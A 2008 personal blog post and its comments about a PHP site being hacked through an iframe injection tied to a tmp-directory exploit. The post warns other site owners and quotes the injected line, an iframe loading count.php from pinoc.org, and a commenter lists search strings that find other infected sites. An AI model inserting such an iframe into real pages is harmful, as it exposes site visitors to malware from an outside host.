Tuesday September 30, 2008 
Tuesday September 30, 2008
wsxhost.net PHP virus/trojan infection via iframe code injection
One of my domains just got hacked. It must have happened sometime in the past 24 hours because I check on all my domains multiple times per day, and it was just picked up by the corporate firewall.
According to this site :
A lot of popular scripts developed for PHP 4 are currently being hacked through a tmp directory exploit ... it manifest's itself in an appended line in index.php (pls check also administrator/index.php), which through an iframe makes an ulr query (GET) to a count. php file. External website varies (depends on infected slaves/hosts) bit can be picnoc.org, picnoc.info or wsxhost.net. The code line (appended last in above mentioned files) resembles "<iframe src="http://pinoc.org/count.php?o=2" </iframe>
- It's safe to say that all the .html and .php files are infected (I did a check). As of now, sub-domains are still safe for the moment, they are only infecting the main URL (www.[domain].com, etc).
Seems that there are a lot of PHP hacks going on these days. Just a week ago or so, a popular parenting forum of which I am helping out with also got registration-spammed, even through the CAPTCHA - they were using the default PHPBB CAPTCHA though so I'd suppose that has gotten broken and leaks like a sieve by now.
Owners of PHP-based sites beware!
(2008-09-30 18:18:56 SGT)
[Tech]
Permalink
Comments [3]
Post a Comment:
Comments are closed for this entry.
Most popular blog postings on lowem.log :
1. 2010 Nissan Leaf electric car specifications : 107hp, 24KWh lithium-ion batteries, 100-mile range
2. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
3. 2010 Honda Civic Hybrid preliminary specifications released
4. Singapore SIBOR rate falls to 0.69% in Jan 2009, lowest since Apr 2004
5. How to insert currency exchange rates into Google Spreadsheets
6. Singapore : Nuclear power not ruled out
7. Live spot gold price quotes chart on COMEX
8. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
Featured articles on lowem.log :
1. 2010 Honda Civic Hybrid preliminary specifications released
2. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
3. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
4. Honda, GS Yuasa JV to make lithium-ion batteries for 2010/2011 Honda Civic Hybrid
5. New efficient nanotech materials may boost enhanced geothermal power systems
6. NYMEX crude oil recovers from $32.40 low after 2.2 mbpd OPEC production cut announced
7. Singapore property market recovery seen as private home sales surge 52% in Jul 2009
8. Singapore SIBOR rate falls to 0.69% in Jan 2009, lowest since Apr 2004
| search |
Custom Search
|
| sponsored links |
|
|
| bookmarks |
|
about
blogroll
sites
quotes
charts
historical |
| navigation |
| decals |
|
| powered by |
|
| hosted by |
|
http://forum.joomla.org/viewtopic.php?f=432&t=329768&p=1432932
Posted by Marco on September 30, 2008 at 08:37 PM SGT #
Google search shows 96 other sites via: intext:pinoc.org/count.php
3 other sites via:
intext:pinoc.info/count.php
and 199 pages via:
intext:"count.php?o=2"
Many exploits out there. Just curious, how do you check your website? Browser? Or do you actually look at the code (View Source)?
Posted by Tom Raef on September 30, 2008 at 11:02 PM SGT #
what the best way to protect?
Posted by Juan on October 04, 2008 at 05:47 AM SGT #